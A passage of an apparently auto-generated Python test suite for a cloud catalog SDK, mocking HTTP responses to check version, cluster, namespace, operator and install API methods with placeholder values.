url = self.preprocess_url(_base_url + '/versions/testString')
mock_response = '{"id": "id", "_rev": "rev", "url": "url", "crn": "crn", "label": "label", "name": "name", "offering_icon_url": "offering_icon_url", "offering_docs_url": "offering_docs_url", "offering_support_url": "offering_support_url", "tags": ["tags"], "keywords": ["keywords"], "rating": {"one_star_count": 14, "two_star_count": 14, "three_star_count": 16, "four_star_count": 15}, "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "short_description": "short_description", "long_description": "long_description", "features": [{"title": "title", "description": "description"}], "kinds": [{"id": "id", "format_kind": "format_kind", "target_kind": "target_kind", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "install_description": "install_description", "tags": ["tags"], "additional_features": [{"title": "title", "description": "description"}], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "versions": [{"id": "id", "_rev": "rev", "crn": "crn", "version": "version", "sha": "sha", "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "offering_id": "offering_id", "catalog_id": "catalog_id", "kind_id": "kind_id", "tags": ["tags"], "repo_url": "repo_url", "source_url": "source_url", "tgz_url": "tgz_url", "configuration": [{"key": "key", "type": "type", "default_value": {"anyKey": "anyValue"}, "value_constraint": "value_constraint", "description": "description", "required": true, "options": [{"anyKey": "anyValue"}], "hidden": true}], "metadata": {"mapKey": {"anyKey": "anyValue"}}, "validation": {"validated": "2019-01-01T12:00:00.000Z", "requested": "2019-01-01T12:00:00.000Z", "state": "state", "last_operation": "last_operation", "target": {"mapKey": {"anyKey": "anyValue"}}}, "required_resources": [{"type": "mem", "value": {"anyKey": "anyValue"}}], "single_instance": false, "install": {"instructions": "instructions", "script": "script", "script_permission": "script_permission", "delete_script": "delete_script", "scope": "scope"}, "pre_install": [{"instructions": "instructions", "script": "script", "script_permission": "script_permission", "delete_script": "delete_script", "scope": "scope"}], "entitlement": {"provider_name": "provider_name", "provider_id": "provider_id", "product_id": "product_id", "part_numbers": ["part_numbers"], "image_repo_name": "image_repo_name"}, "licenses": [{"id": "id", "name": "name", "type": "type", "url": "url", "description": "description"}], "image_manifest_url": "image_manifest_url", "deprecated": true, "package_version": "package_version", "state": {"current": "current", "current_entered": "2019-01-01T12:00:00.000Z", "pending": "pending", "pending_requested": "2019-01-01T12:00:00.000Z", "previous": "previous"}, "version_locator": "version_locator", "console_url": "console_url", "long_description": "long_description", "whitelisted_accounts": ["whitelisted_accounts"]}], "plans": [{"id": "id", "label": "label", "name": "name", "short_description": "short_description", "long_description": "long_description", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "tags": ["tags"], "additional_features": [{"title": "title", "description": "description"}], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "deployments": [{"id": "id", "label": "label", "name": "name", "short_description": "short_description", "long_description": "long_description", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "tags": ["tags"], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z"}]}]}], "permit_request_ibm_public_publish": false, "ibm_publish_approved": true, "public_publish_approved": false, "public_original_crn": "public_original_crn", "publish_public_crn": "publish_public_crn", "portal_approval_record": "portal_approval_record", "portal_ui_url": "portal_ui_url", "catalog_id": "catalog_id", "catalog_name": "catalog_name", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "disclaimer": "disclaimer", "hidden": true, "provider": "provider", "repo_info": {"token": "token", "type": "type"}}'
responses.add(responses.GET,
url,
body=mock_response,
content_type='application/json',
status=200)
# Set up parameter values
version_loc_id = 'testString'
# Invoke method
response = _service.get_version(
version_loc_id,
headers={}
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
@responses.activate
def test_get_version_value_error(self):
"""
test_get_version_value_error()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/versions/testString')
mock_response = '{"id": "id", "_rev": "rev", "url": "url", "crn": "crn", "label": "label", "name": "name", "offering_icon_url": "offering_icon_url", "offering_docs_url": "offering_docs_url", "offering_support_url": "offering_support_url", "tags": ["tags"], "keywords": ["keywords"], "rating": {"one_star_count": 14, "two_star_count": 14, "three_star_count": 16, "four_star_count": 15}, "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "short_description": "short_description", "long_description": "long_description", "features": [{"title": "title", "description": "description"}], "kinds": [{"id": "id", "format_kind": "format_kind", "target_kind": "target_kind", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "install_description": "install_description", "tags": ["tags"], "additional_features": [{"title": "title", "description": "description"}], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "versions": [{"id": "id", "_rev": "rev", "crn": "crn", "version": "version", "sha": "sha", "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "offering_id": "offering_id", "catalog_id": "catalog_id", "kind_id": "kind_id", "tags": ["tags"], "repo_url": "repo_url", "source_url": "source_url", "tgz_url": "tgz_url", "configuration": [{"key": "key", "type": "type", "default_value": {"anyKey": "anyValue"}, "value_constraint": "value_constraint", "description": "description", "required": true, "options": [{"anyKey": "anyValue"}], "hidden": true}], "metadata": {"mapKey": {"anyKey": "anyValue"}}, "validation": {"validated": "2019-01-01T12:00:00.000Z", "requested": "2019-01-01T12:00:00.000Z", "state": "state", "last_operation": "last_operation", "target": {"mapKey": {"anyKey": "anyValue"}}}, "required_resources": [{"type": "mem", "value": {"anyKey": "anyValue"}}], "single_instance": false, "install": {"instructions": "instructions", "script": "script", "script_permission": "script_permission", "delete_script": "delete_script", "scope": "scope"}, "pre_install": [{"instructions": "instructions", "script": "script", "script_permission": "script_permission", "delete_script": "delete_script", "scope": "scope"}], "entitlement": {"provider_name": "provider_name", "provider_id": "provider_id", "product_id": "product_id", "part_numbers": ["part_numbers"], "image_repo_name": "image_repo_name"}, "licenses": [{"id": "id", "name": "name", "type": "type", "url": "url", "description": "description"}], "image_manifest_url": "image_manifest_url", "deprecated": true, "package_version": "package_version", "state": {"current": "current", "current_entered": "2019-01-01T12:00:00.000Z", "pending": "pending", "pending_requested": "2019-01-01T12:00:00.000Z", "previous": "previous"}, "version_locator": "version_locator", "console_url": "console_url", "long_description": "long_description", "whitelisted_accounts": ["whitelisted_accounts"]}], "plans": [{"id": "id", "label": "label", "name": "name", "short_description": "short_description", "long_description": "long_description", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "tags": ["tags"], "additional_features": [{"title": "title", "description": "description"}], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "deployments": [{"id": "id", "label": "label", "name": "name", "short_description": "short_description", "long_description": "long_description", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "tags": ["tags"], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z"}]}]}], "permit_request_ibm_public_publish": false, "ibm_publish_approved": true, "public_publish_approved": false, "public_original_crn": "public_original_crn", "publish_public_crn": "publish_public_crn", "portal_approval_record": "portal_approval_record", "portal_ui_url": "portal_ui_url", "catalog_id": "catalog_id", "catalog_name": "catalog_name", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "disclaimer": "disclaimer", "hidden": true, "provider": "provider", "repo_info": {"token": "token", "type": "type"}}'
responses.add(responses.GET,
url,
body=mock_response,
content_type='application/json',
status=200)
# Set up parameter values
version_loc_id = 'testString'
# Pass in all but one required param and check for a ValueError
req_param_dict = {
"version_loc_id": version_loc_id,
}
for param in req_param_dict.keys():
req_copy = {key:val if key is not param else None for (key,val) in req_param_dict.items()}
with pytest.raises(ValueError):
_service.get_version(**req_copy)
class TestDeleteVersion():
"""
Test Class for delete_version
"""
def preprocess_url(self, request_url: str):
"""
Preprocess the request URL to ensure the mock response will be found.
"""
if re.fullmatch('.*/+', request_url) is None:
return request_url
else:
return re.compile(request_url.rstrip('/') + '/+')
@responses.activate
def test_delete_version_all_params(self):
"""
delete_version()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/versions/testString')
responses.add(responses.DELETE,
url,
status=200)
# Set up parameter values
version_loc_id = 'testString'
# Invoke method
response = _service.delete_version(
version_loc_id,
headers={}
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
@responses.activate
def test_delete_version_value_error(self):
"""
test_delete_version_value_error()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/versions/testString')
responses.add(responses.DELETE,
url,
status=200)
# Set up parameter values
version_loc_id = 'testString'
# Pass in all but one required param and check for a ValueError
req_param_dict = {
"version_loc_id": version_loc_id,
}
for param in req_param_dict.keys():
req_copy = {key:val if key is not param else None for (key,val) in req_param_dict.items()}
with pytest.raises(ValueError):
_service.delete_version(**req_copy)
# endregion
##############################################################################
# End of Service: Versions
##############################################################################
##############################################################################
# Start of Service: Deploy
##############################################################################
# region
class TestGetCluster():
"""
Test Class for get_cluster
"""
def preprocess_url(self, request_url: str):
"""
Preprocess the request URL to ensure the mock response will be found.
"""
if re.fullmatch('.*/+', request_url) is None:
return request_url
else:
return re.compile(request_url.rstrip('/') + '/+')
@responses.activate
def test_get_cluster_all_params(self):
"""
get_cluster()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/deploy/kubernetes/clusters/testString')
mock_response = '{"resource_group_id": "resource_group_id", "resource_group_name": "resource_group_name", "id": "id", "name": "name", "region": "region"}'
responses.add(responses.GET,
url,
body=mock_response,
content_type='application/json',
status=200)
# Set up parameter values
cluster_id = 'testString'
region = 'testString'
x_auth_refresh_token = 'testString'
# Invoke method
response = _service.get_cluster(
cluster_id,
region,
x_auth_refresh_token,
headers={}
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
# Validate query params
query_string = responses.calls[0].request.url.split('?',1)[1]
query_string = urllib.parse.unquote_plus(query_string)
assert 'region={}'.format(region) in query_string
@responses.activate
def test_get_cluster_value_error(self):
"""
test_get_cluster_value_error()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/deploy/kubernetes/clusters/testString')
mock_response = '{"resource_group_id": "resource_group_id", "resource_group_name": "resource_group_name", "id": "id", "name": "name", "region": "region"}'
responses.add(responses.GET,
url,
body=mock_response,
content_type='application/json',
status=200)
# Set up parameter values
cluster_id = 'testString'
region = 'testString'
x_auth_refresh_token = 'testString'
# Pass in all but one required param and check for a ValueError
req_param_dict = {
"cluster_id": cluster_id,
"region": region,
"x_auth_refresh_token": x_auth_refresh_token,
}
for param in req_param_dict.keys():
req_copy = {key:val if key is not param else None for (key,val) in req_param_dict.items()}
with pytest.raises(ValueError):
_service.get_cluster(**req_copy)
class TestGetNamespaces():
"""
Test Class for get_namespaces
"""
def preprocess_url(self, request_url: str):
"""
Preprocess the request URL to ensure the mock response will be found.
"""
if re.fullmatch('.*/+', request_url) is None:
return request_url
else:
return re.compile(request_url.rstrip('/') + '/+')
@responses.activate
def test_get_namespaces_all_params(self):
"""
get_namespaces()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/deploy/kubernetes/clusters/testString/namespaces')
mock_response = '{"offset": 6, "limit": 5, "total_count": 11, "resource_count": 14, "first": "first", "last": "last", "prev": "prev", "next": "next", "resources": ["resources"]}'
responses.add(responses.GET,
url,
body=mock_response,
content_type='application/json',
status=200)
# Set up parameter values
cluster_id = 'testString'
region = 'testString'
x_auth_refresh_token = 'testString'
limit = 1000
offset = 38
# Invoke method
response = _service.get_namespaces(
cluster_id,
region,
x_auth_refresh_token,
limit=limit,
offset=offset,
headers={}
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
# Validate query params
query_string = responses.calls[0].request.url.split('?',1)[1]
query_string = urllib.parse.unquote_plus(query_string)
assert 'region={}'.format(region) in query_string
assert 'limit={}'.format(limit) in query_string
assert 'offset={}'.format(offset) in query_string
@responses.activate
def test_get_namespaces_required_params(self):
"""
test_get_namespaces_required_params()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/deploy/kubernetes/clusters/testString/namespaces')
mock_response = '{"offset": 6, "limit": 5, "total_count": 11, "resource_count": 14, "first": "first", "last": "last", "prev": "prev", "next": "next", "resources": ["resources"]}'
responses.add(responses.GET,
url,
body=mock_response,
content_type='application/json',
status=200)
# Set up parameter values
cluster_id = 'testString'
region = 'testString'
x_auth_refresh_token = 'testString'
# Invoke method
response = _service.get_namespaces(
cluster_id,
region,
x_auth_refresh_token,
headers={}
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
# Validate query params
query_string = responses.calls[0].request.url.split('?',1)[1]
query_string = urllib.parse.unquote_plus(query_string)
assert 'region={}'.format(region) in query_string
@responses.activate
def test_get_namespaces_value_error(self):
"""
test_get_namespaces_value_error()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/deploy/kubernetes/clusters/testString/namespaces')
mock_response = '{"offset": 6, "limit": 5, "total_count": 11, "resource_count": 14, "first": "first", "last": "last", "prev": "prev", "next": "next", "resources": ["resources"]}'
responses.add(responses.GET,
url,
body=mock_response,
content_type='application/json',
status=200)
# Set up parameter values
cluster_id = 'testString'
region = 'testString'
x_auth_refresh_token = 'testString'
# Pass in all but one required param and check for a ValueError
req_param_dict = {
"cluster_id": cluster_id,
"region": region,
"x_auth_refresh_token": x_auth_refresh_token,
}
for param in req_param_dict.keys():
req_copy = {key:val if key is not param else None for (key,val) in req_param_dict.items()}
with pytest.raises(ValueError):
_service.get_namespaces(**req_copy)
class TestDeployOperators():
"""
Test Class for deploy_operators
"""
def preprocess_url(self, request_url: str):
"""
Preprocess the request URL to ensure the mock response will be found.
"""
if re.fullmatch('.*/+', request_url) is None:
return request_url
else:
return re.compile(request_url.rstrip('/') + '/+')
@responses.activate
def test_deploy_operators_all_params(self):
"""
deploy_operators()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/deploy/kubernetes/olm/operator')
mock_response = '[{"phase": "phase", "message": "message", "link": "link", "name": "name", "version": "version", "namespace": "namespace", "package_name": "package_name", "catalog_id": "catalog_id"}]'
responses.add(responses.POST,
url,
body=mock_response,
content_type='application/json',
status=200)
# Set up parameter values
x_auth_refresh_token = 'testString'
cluster_id = 'testString'
region = 'testString'
namespaces = ['testString']
all_namespaces = True
version_locator_id = 'testString'
# Invoke method
response = _service.deploy_operators(
x_auth_refresh_token,
cluster_id=cluster_id,
region=region,
namespaces=namespaces,
all_namespaces=all_namespaces,
version_locator_id=version_locator_id,
headers={}
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
# Validate body params
req_body = json.loads(str(responses.calls[0].request.body, 'utf-8'))
assert req_body['cluster_id'] == 'testString'
assert req_body['region'] == 'testString'
assert req_body['namespaces'] == ['testString']
assert req_body['all_namespaces'] == True
assert req_body['version_locator_id'] == 'testString'
@responses.activate
def test_deploy_operators_required_params(self):
"""
test_deploy_operators_required_params()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/deploy/kubernetes/olm/operator')
mock_response = '[{"phase": "phase", "message": "message", "link": "link", "name": "name", "version": "version", "namespace": "namespace", "package_name": "package_name", "catalog_id": "catalog_id"}]'
responses.add(responses.POST,
url,
body=mock_response,
content_type='application/json',
status=200)
# Set up parameter values
x_auth_refresh_token = 'testString'
# Invoke method
response = _service.deploy_operators(
x_auth_refresh_token,
headers={}
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
@responses.activate
def test_deploy_operators_value_error(self):
"""
test_deploy_operators_value_error()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/deploy/kubernetes/olm/operator')
mock_response = '[{"phase": "phase", "message": "message", "link": "link", "name": "name", "version": "version", "namespace": "namespace", "package_name": "package_name", "catalog_id": "catalog_id"}]'
responses.add(responses.POST,
url,
body=mock_response,
content_type='application/json',
status=200)
# Set up parameter values
x_auth_refresh_token = 'testString'
# Pass in all but one required param and check for a ValueError
req_param_dict = {
"x_auth_refresh_token": x_auth_refresh_token,
}
for param in req_param_dict.keys():
req_copy = {key:val if key is not param else None for (key,val) in req_param_dict.items()}
with pytest.raises(ValueError):
_service.deploy_operators(**req_copy)
class TestListOperators():
"""
Test Class for list_operators
"""
def preprocess_url(self, request_url: str):
"""
Preprocess the request URL to ensure the mock response will be found.
"""
if re.fullmatch('.*/+', request_url) is None:
return request_url
else:
return re.compile(request_url.rstrip('/') + '/+')
@responses.activate
def test_list_operators_all_params(self):
"""
list_operators()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/deploy/kubernetes/olm/operator')
mock_response = '[{"phase": "phase", "message": "message", "link": "link", "name": "name", "version": "version", "namespace": "namespace", "package_name": "package_name", "catalog_id": "catalog_id"}]'
responses.add(responses.GET,
url,
body=mock_response,
content_type='application/json',
status=200)
# Set up parameter values
x_auth_refresh_token = 'testString'
cluster_id = 'testString'
region = 'testString'
version_locator_id = 'testString'
# Invoke method
response = _service.list_operators(
x_auth_refresh_token,
cluster_id,
region,
version_locator_id,
headers={}
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
# Validate query params
query_string = responses.calls[0].request.url.split('?',1)[1]
query_string = urllib.parse.unquote_plus(query_string)
assert 'cluster_id={}'.format(cluster_id) in query_string
assert 'region={}'.format(region) in query_string
assert 'version_locator_id={}'.format(version_locator_id) in query_string
@responses.activate
def test_list_operators_value_error(self):
"""
test_list_operators_value_error()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/deploy/kubernetes/olm/operator')
mock_response = '[{"phase": "phase", "message": "message", "link": "link", "name": "name", "version": "version", "namespace": "namespace", "package_name": "package_name", "catalog_id": "catalog_id"}]'
responses.add(responses.GET,
url,
body=mock_response,
content_type='application/json',
status=200)
# Set up parameter values
x_auth_refresh_token = 'testString'
cluster_id = 'testString'
region = 'testString'
version_locator_id = 'testString'
# Pass in all but one required param and check for a ValueError
req_param_dict = {
"x_auth_refresh_token": x_auth_refresh_token,
"cluster_id": cluster_id,
"region": region,
"version_locator_id": version_locator_id,
}
for param in req_param_dict.keys():
req_copy = {key:val if key is not param else None for (key,val) in req_param_dict.items()}
with pytest.raises(ValueError):
_service.list_operators(**req_copy)
class TestReplaceOperators():
"""
Test Class for replace_operators
"""
def preprocess_url(self, request_url: str):
"""
Preprocess the request URL to ensure the mock response will be found.
"""
if re.fullmatch('.*/+', request_url) is None:
return request_url
else:
return re.compile(request_url.rstrip('/') + '/+')
@responses.activate
def test_replace_operators_all_params(self):
"""
replace_operators()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/deploy/kubernetes/olm/operator')
mock_response = '[{"phase": "phase", "message": "message", "link": "link", "name": "name", "version": "version", "namespace": "namespace", "package_name": "package_name", "catalog_id": "catalog_id"}]'
responses.add(responses.PUT,
url,
body=mock_response,
content_type='application/json',
status=200)
# Set up parameter values
x_auth_refresh_token = 'testString'
cluster_id = 'testString'
region = 'testString'
namespaces = ['testString']
all_namespaces = True
version_locator_id = 'testString'
# Invoke method
response = _service.replace_operators(
x_auth_refresh_token,
cluster_id=cluster_id,
region=region,
namespaces=namespaces,
all_namespaces=all_namespaces,
version_locator_id=version_locator_id,
headers={}
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
# Validate body params
req_body = json.loads(str(responses.calls[0].request.body, 'utf-8'))
assert req_body['cluster_id'] == 'testString'
assert req_body['region'] == 'testString'
assert req_body['namespaces'] == ['testString']
assert req_body['all_namespaces'] == True
assert req_body['version_locator_id'] == 'testString'
@responses.activate
def test_replace_operators_required_params(self):
"""
test_replace_operators_required_params()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/deploy/kubernetes/olm/operator')
mock_response = '[{"phase": "phase", "message": "message", "link": "link", "name": "name", "version": "version", "namespace": "namespace", "package_name": "package_name", "catalog_id": "catalog_id"}]'
responses.add(responses.PUT,
url,
body=mock_response,
content_type='application/json',
status=200)
# Set up parameter values
x_auth_refresh_token = 'testString'
# Invoke method
response = _service.replace_operators(
x_auth_refresh_token,
headers={}
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
@responses.activate
def test_replace_operators_value_error(self):
"""
test_replace_operators_value_error()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/deploy/kubernetes/olm/operator')
mock_response = '[{"phase": "phase", "message": "message", "link": "link", "name": "name", "version": "version", "namespace": "namespace", "package_name": "package_name", "catalog_id": "catalog_id"}]'
responses.add(responses.PUT,
url,
body=mock_response,
content_type='application/json',
status=200)
# Set up parameter values
x_auth_refresh_token = 'testString'
# Pass in all but one required param and check for a ValueError
req_param_dict = {
"x_auth_refresh_token": x_auth_refresh_token,
}
for param in req_param_dict.keys():
req_copy = {key:val if key is not param else None for (key,val) in req_param_dict.items()}
with pytest.raises(ValueError):
_service.replace_operators(**req_copy)
class TestDeleteOperators():
"""
Test Class for delete_operators
"""
def preprocess_url(self, request_url: str):
"""
Preprocess the request URL to ensure the mock response will be found.
"""
if re.fullmatch('.*/+', request_url) is None:
return request_url
else:
return re.compile(request_url.rstrip('/') + '/+')
@responses.activate
def test_delete_operators_all_params(self):
"""
delete_operators()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/deploy/kubernetes/olm/operator')
responses.add(responses.DELETE,
url,
status=200)
# Set up parameter values
x_auth_refresh_token = 'testString'
cluster_id = 'testString'
region = 'testString'
version_locator_id = 'testString'
# Invoke method
response = _service.delete_operators(
x_auth_refresh_token,
cluster_id,
region,
version_locator_id,
headers={}
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
# Validate query params
query_string = responses.calls[0].request.url.split('?',1)[1]
query_string = urllib.parse.unquote_plus(query_string)
assert 'cluster_id={}'.format(cluster_id) in query_string
assert 'region={}'.format(region) in query_string
assert 'version_locator_id={}'.format(version_locator_id) in query_string
@responses.activate
def test_delete_operators_value_error(self):
"""
test_delete_operators_value_error()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/deploy/kubernetes/olm/operator')
responses.add(responses.DELETE,
url,
status=200)
# Set up parameter values
x_auth_refresh_token = 'testString'
cluster_id = 'testString'
region = 'testString'
version_locator_id = 'testString'
# Pass in all but one required param and check for a ValueError
req_param_dict = {
"x_auth_refresh_token": x_auth_refresh_token,
"cluster_id": cluster_id,
"region": region,
"version_locator_id": version_locator_id,
}
for param in req_param_dict.keys():
req_copy = {key:val if key is not param else None for (key,val) in req_param_dict.items()}
with pytest.raises(ValueError):
_service.delete_operators(**req_copy)
class TestInstallVersion():
"""
Test Class for install_version
"""
def preprocess_url(self, request_url: str):
"""
Preprocess the request URL to ensure the mock response will be found.
"""
if re.fullmatch('.*/+', request_url) is None:
return request_url
else:
return re.compile(request_url.rstrip('/') + '/+')
@responses.activate
def test_install_version_all_params(self):
"""
install_version()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/versions/testString/install')
responses.add(responses.POST,
url,
status=202)
# Construct a dict representation of a DeployRequestBodySchematics model
deploy_request_body_schematics_model = {}
deploy_request_body_schematics_model['name'] = 'testString'
deploy_request_body_schematics_model['description'] = 'testString'
deploy_request_body_schematics_model['tags'] = ['testString']
deploy_request_body_schematics_model['resource_group_id'] = 'testString'
# Set up parameter values
version_loc_id = 'testString'
x_auth_refresh_token = 'testString'
cluster_id = 'testString'
region = 'testString'
namespace = 'testString'
override_values = {}
entitlement_apikey = 'testString'
schematics = deploy_request_body_schematics_model
script = 'testString'
script_id = 'testString'
version_locator_id = 'testString'
vcenter_id = 'testString'
vcenter_user = 'testString'
vcenter_password = 'testString'
vcenter_location = 'testString'
vcenter_datastore = 'testString'
# Invoke method
response = _service.install_version(
version_loc_id,
x_auth_refresh_token,
cluster_id=cluster_id,
region=region,
namespace=namespace,
override_values=override_values,
entitlement_apikey=entitlement_apikey,
schematics=schematics,
script=script,
script_id=script_id,
version_locator_id=version_locator_id,
vcenter_id=vcenter_id,
vcenter_user=vcenter_user,
vcenter_password=vcenter_password,
vcenter_location=vcenter_location,
vcenter_datastore=vcenter_datastore,
headers={}
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 202
# Validate body params
req_body = json.loads(str(responses.calls[0].request.body, 'utf-8'))
assert req_body['cluster_id'] == 'testString'
assert req_body['region'] == 'testString'
assert req_body['namespace'] == 'testString'
assert req_body['override_values'] == {}
assert req_body['entitlement_apikey'] == 'testString'
assert req_body['schematics'] == deploy_request_body_schematics_model
assert req_body['script'] == 'testString'
assert req_body['script_id'] == 'testString'
assert req_body['version_locator_id'] == 'testString'
assert req_body['vcenter_id'] == 'testString'
assert req_body['vcenter_user'] == 'testString'
assert req_body['vcenter_password'] == 'testString'
assert req_body['vcenter_location'] == 'testString'
assert req_body['vcenter_datastore'] == 'testString'
@responses.activate
def test_install_version_required_params(self):
"""
test_install_version_required_params()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/versions/testString/install')
responses.add(responses.POST,
url,
status=202)
# Set up parameter values
version_loc_id = 'testString'
x_auth_refresh_token = 'testString'
# Invoke method
response = _service.install_version(
version_loc_id,
x_auth_refresh_token,
headers={}
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 202
@responses.activate
def test_install_version_value_error(self):
"""
test_install_version_value_error()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/versions/testString/install')
responses.add(responses.POST,
url,
status=202)
# Set up parameter values
version_loc_id = 'testString'
x_auth_refresh_token = 'testString'
# Pass in all but one required param and check for a ValueError
req_param_dict = {
"version_loc_id": version_loc_id,
"x_auth_refresh_token": x_auth_refresh_token,
}
for param in req_param_dict.keys():
req_copy = {key:val if key is not param else None for (key,val) in req_param_dict.items()}
with pytest.raises(ValueError):
_service.install_version(**req_copy)
class TestPreinstallVersion():
"""
Test Class for preinstall_version
"""
def preprocess_url(self, request_url: str):
"""
Preprocess the request URL to ensure the mock response will be found.
"""
if re.fullmatch('.*/+', request_url) is None:
return request_url
else:
return re.compile(request_url.rstrip('/') + '/+')
@responses.activate
def test_preinstall_version_all_params(self):
"""
preinstall_version()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/versions/testString/preinstall')
responses.add(responses.POST,
url,
status=202)
# Construct a dict representation of a DeployRequestBodySchematics model
deploy_request_body_schematics_model = {}
deploy_request_body_schematics_model['name'] = 'testString'
deploy_request_body_schematics_model['description'] = 'testString'
deploy_request_body_schematics_model['tags'] = ['testString']
deploy_request_body_schematics_model['resource_group_id'] = 'testString'
# Set up parameter values
version_loc_id = 'testString'
x_auth_refresh_token = 'testString'
cluster_id = 'testString'
region = 'testString'
namespace = 'testString'
override_values = {}
entitlement_apikey = 'testString'
schematics = deploy_request_body_schematics_model
script = 'testString'
script_id = 'testString'
version_locator_id = 'testString'
vcenter_id = 'testString'
vcenter_user = 'testString'
vcenter_password = 'testString'
vcenter_location = 'testString'
vcenter_datastore = 'testString'
# Invoke method
response = _service.preinstall_version(
version_loc_id,
x_auth_refresh_token,
cluster_id=cluster_id,
region=region,
namespace=namespace,
override_values=override_values,
entitlement_apikey=entitlement_apikey,
schematics=schematics,
script=script,
script_id=script_id,
version_locator_id=version_locator_id,
vcenter_id=vcenter_id,
vcenter_user=vcenter_user,
vcenter_password=vcenter_password,
vcenter_location=vcenter_location,
vcenter_datastore=vcenter_datastore,
headers={}
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 202
# Validate body params
req_body = json.loads(str(responses.calls[0].request.body, 'utf-8'))
assert req_body['cluster_id'] == 'testString'
assert req_body['region'] == 'testString'
assert req_body['namespace'] == 'testString'
assert req_body['override_values'] == {}
assert req_body['entitlement_apikey'] == 'testString'
assert req_body['schematics'] == deploy_request_body_schematics_model
assert req_body['script'] == 'testString'
assert req_body['script_id'] == 'testString'
assert req_body['version_locator_id'] == 'testString'
assert req_body['vcenter_id'] == 'testString'
assert req_body['vcenter_user'] == 'testString'
assert req_body['vcenter_password'] == 'testString'
assert req_body['vcenter_location'] == 'testString'
assert req_body['vcenter_datastore'] == 'testString'
@responses.activate
def test_preinstall_version_required_params(self):
"""
test_preinstall_version_required_params()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/versions/testString/preinstall')
responses.add(responses.POST,
url,
status=202)
# Set up parameter values
version_loc_id = 'testString'
x_auth_refresh_token = 'testString'
# Invoke method
response = _service.preinstall_version(
version_loc_id,
x_auth_refresh_token,
headers={}
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 202
@responses.activate
def test_preinstall_version_value_error(self):
"""
test_preinstall_version_value_error()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/versions/testString/preinstall')
responses.add(responses.POST,
url,
status=202)
# Set up parameter values
version_loc_id = 'testString'
x_auth_refresh_token = 'testString'
# Pass in all but one required param and check for a ValueError
req_param_dict = {
"version_loc_id": version_loc_id,
"x_auth_refresh_token": x_auth_refresh_token,
}
for param in req_param_dict.keys():
req_copy = {key:val if key is not param else None for (key,val) in req_param_dict.items()}
with pytest.raises(ValueError):
_service.preinstall_version(**req_copy)
class TestGetPreinstall():
"""
Test Class for get_preinstall
"""
def preprocess_url(self, request_url: str):
"""
Preprocess the request URL to ensure the mock response will be found.
"""
if re.fullmatch('.*/+', request_url) is None:
return request_url
else:
return re.compile(request_url.rstrip('/') + '/+')
@responses.activate
def test_get_preinstall_all_params(self):
"""
get_preinstall()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/versions/testString/preinstall')
mock_response = '{"metadata": {"cluster_id": "cluster_id", "region": "region", "namespace": "namespace", "workspace_id": "workspace_id", "workspace_name": "workspace_name"}, "release": {"deployments": [{"mapKey": {"anyKey": "anyValue"}}], "replicasets": [{"mapKey": {"anyKey": "anyValue"}}], "statefulsets": [{"mapKey": {"anyKey": "anyValue"}}], "pods": [{"mapKey": {"anyKey": "anyValue"}}], "errors": [{"mapKey": "inner"}]}, "content_mgmt": {"pods": [{"mapKey": "inner"}], "errors": [{"mapKey": "inner"}]}}'
responses.add(responses.GET,
url,
body=mock_response,
